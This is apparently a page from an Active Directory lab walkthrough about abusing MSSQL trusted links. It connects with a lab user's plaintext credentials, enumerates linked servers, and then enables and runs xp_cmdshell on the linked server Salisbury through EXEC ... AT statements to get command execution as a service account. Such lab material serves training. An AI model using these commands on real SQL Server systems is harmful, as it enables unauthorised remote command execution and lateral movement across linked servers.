MSSQL trusted links

Another SQL abuse we could try on the lab, is the usage of mssql trusted links.

Note that trusted link is also a forest to forest technique

To abuse the links let’s connect with elena.lopez and use enum_links

mssqlclient.py -windows-auth north.newyork.local/elena.lopez:princesa1@yonkers.north.newyork.local -show

enum_links

This play the following queries :

EXEC sp_linkedservers
EXEC sp_helplinkedsrvlogin

As we can see a linked server exist with the name Salisbury and a mapping exist with the user Elena.Lopez and sa on Salisbury.
If we use the link we can get a command injection on Salisbury:

use_link Salisbury
enable_xp_cmdshell
xp_cmdshell whoami

This play the following MSSQL commands :

EXEC ('select system_user as "username"') AT Salisbury
EXEC ('exec master.dbo.sp_configure ''show advanced options'',1;RECONFIGURE;exec master.dbo.sp_configure ''xp_cmdshell'', 1;RECONFIGURE;') AT Salisbury
EXEC ('exec master..xp_cmdshell ''whoami''') AT Salisbury

We got a command injection on Salisbury.Maryland.local as maryland\sql_svc\

PreviousMSSQL Coerce and relay NextMSSQL Command execution to shell - Yonkers

Last updated 2 years ago